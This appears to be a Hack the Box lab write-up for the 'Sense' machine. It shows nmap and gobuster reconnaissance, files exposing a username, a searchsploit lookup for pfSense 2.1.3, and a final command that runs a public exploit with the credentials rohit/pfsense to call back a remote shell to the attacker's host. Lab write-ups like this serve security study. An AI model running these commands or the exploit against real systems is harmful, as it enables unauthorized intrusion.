Skip to content

Latest commit

 

History

History
88 lines (66 loc) · 2.71 KB

sense.md

File metadata and controls

88 lines (66 loc) · 2.71 KB

Hack the Box - Sense

Machine IP: 10.10.10.60

NMAP

▶ nmap -Pn -sS -p- 10.10.10.60 -T4 --min-rate 1000 -oN surface.nmap

Nmap scan report for 10.10.10.60
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 129.73 seconds
▶ nmap -sC -sV -p 80,443 10.10.10.60 -oN deep.nmap

Nmap scan report for 10.10.10.60
Host is up (0.18s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.14 seconds

HTTP/ HTTPS

image


Content Discovery

  • Directory and File Brute-force
▶ gobuster dir -u https://10.10.10.60 -w /seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --no-tls-validation -x txt -t 50

image

  • https://10.10.10.60/changelog.txt image

  • https://10.10.10.60/system-users.txt image


PFSense

  • Login image

  • Dashboard image

Searchsploit

▶ searchsploit pfsense 2.1.3

image image


Exploit

▶ python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.25 --lport 8080 --username rohit --password pfsense

image